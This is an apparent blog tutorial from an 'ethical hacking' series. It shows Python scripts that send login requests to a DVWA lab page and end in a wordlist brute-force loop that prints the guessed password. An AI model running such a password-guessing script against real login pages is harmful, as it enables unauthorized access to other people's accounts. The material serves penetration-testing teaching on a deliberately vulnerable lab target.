Guessing Login Information on Login Pages

Our target website: http://10.0.0.45/dvwa/login.php

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"

data_dict = {"username": "dfdfddfd", "password": "", "Login": "submit"}

response = requests.post(target_url, data = data_dict)

print(response.content.decode())

Execute the Python Script.

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"

data_dict = {"username": "admin", "password": "password", "Login": "submit"}

response = requests.post(target_url, data = data_dict)

print(response.content.decode())

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"

data_dict = {"username": "admin", "password": "", "Login": "submit"}

with open("password.list", "r") as wordlist_file:

    for line in wordlist_file:

        word = line.strip()

        data_dict["password"] = word

        response = requests.post(target_url, data=data_dict)

        if "Login failed" not in response.content.decode():

            print("[+] Got the password --> " + word)

            exit()

print("[+] Reached end of line.")

Python Ethical Hacking - WEB PENETRATION TESTING(5)的更多相关文章

  1. Python Ethical Hacking - WEB PENETRATION TESTING(1)

    WHAT IS A WEBSITE Computer with OS and some servers. Apache, MySQL ...etc. Cotains web application. ...

  2. Python Ethical Hacking - WEB PENETRATION TESTING(2)

     CRAWING DIRECTORIES Directories/folders inside the web root. Can contain files or other directories ...

  3. Python Ethical Hacking - WEB PENETRATION TESTING(4)

    CRAWING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read page HTML. 2. ...

  4. Python Ethical Hacking - WEB PENETRATION TESTING(3)

    CRAWLING SUMMARY Our crawler so far can guess: Subdomains. Directories. Files. Advantages: ->Disc ...

  5. Ethical Hacking - Web Penetration Testing(13)

    OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to ...

  6. Ethical Hacking - Web Penetration Testing(8)

    SQL INJECTION WHAT IS SQL? Most websites use a database to store data. Most data stored in it(userna ...

  7. Ethical Hacking - Web Penetration Testing(10)

    SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...

  8. Ethical Hacking - Web Penetration Testing(6)

    REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ...

  9. Ethical Hacking - Web Penetration Testing(4)

    CODE EXECUTION VULNS Allows an attacker to execute OS commands. Windows or Linux commands. Can be us ...

随机推荐

  1. 不同类型数据库中LIKE语句使用

    不同数据库的LIKE语句使用略有差别,这里记录一下: Oracle数据库: SELECT *FROM userWHEREname LIKE CONCAT('%',#{name},'%')或SELECT ...

  2. JavaWeb网上图书商城完整项目--27.注册页面之注册按钮图片切换实现

    我们要实现立即注册这个按钮,光标获得焦点是一张图片,光标失去焦点的时候是另外一张图片 我们需要在文档加载完成之后,设置该事件hover事件 hover(over,out)这是jQuery的一个模仿悬停 ...

  3. 四层发现-TCP发现

    直接向目标ip发送一个ACK数据包,正常情况下up状态的目标ip会返回一个SRT数据包. 使用scapy构造TCP数据包: 然后在将一些数据类型设置好就可以发送了. 实用脚本实现批量扫描: #!/us ...

  4. java基础-java与c#接口不同点

    1.接口中定义成员 C#,如图我在接口ITest添加了一个字段n,那么vs直接就显示红色的底线,而错误就是接口不能包含字段 java,如下图,编译也是报错但是并不是接口中不能包含而是缺少赋值,那么我们 ...

  5. 呼~~~~--历时几个星期终于搞好了HTTPS协议---阿里云

    打开网站加入阿里云官网 https://yundun.console.aliyun.com/?p=cas#/overview/cn-hangzhou 登陆查看自己的证书 没有点击购买证书 -- 选中对 ...

  6. 02【熟悉】springboot和微服务的介绍

    1,springboot简介 Spring Boot 是由 Pivotal 团队提供的全新框架,其设计目的是用来简化新 Spring 应用的初始搭建以及开发过程. 该框架使用了特定的方式来进行配置,从 ...

  7. Python实用笔记——错误处理

    让我们用一个例子来看看try的机制: try: print('try...') r = 10 / 0 print('result:', r) except ZeroDivisionError as e ...

  8. Python之浅谈面向对象

    目录 面向对象和面向过程 面向过程 面向对象 类与对象 定义类 在现实世界中:先有对象,再有类 在程序中,务必保证:先定义(类),后使用(产生对象) 产生对象 类 对象 产生对象 属性查找顺序 对象赋 ...

  9. Spark 环境问题记录和解决方法

    Spark 版本配套表 名称 版本 说明 Spark spark-2.3.0-bin-hadoop2.7 Spark mongo-java-driver-3.5.0.jar 3.5 Mongo驱动 m ...

  10. 如何修复 WordPress 中的 HTTP 错误

    如何修复我们会向你介绍,如何在 Linux VPS 上修复 WordPress 中的 HTTP 错误. 下面列出了 WordPress 用户遇到的最常见的 HTTP 错误,我们的建议侧重于如何发现错误 ...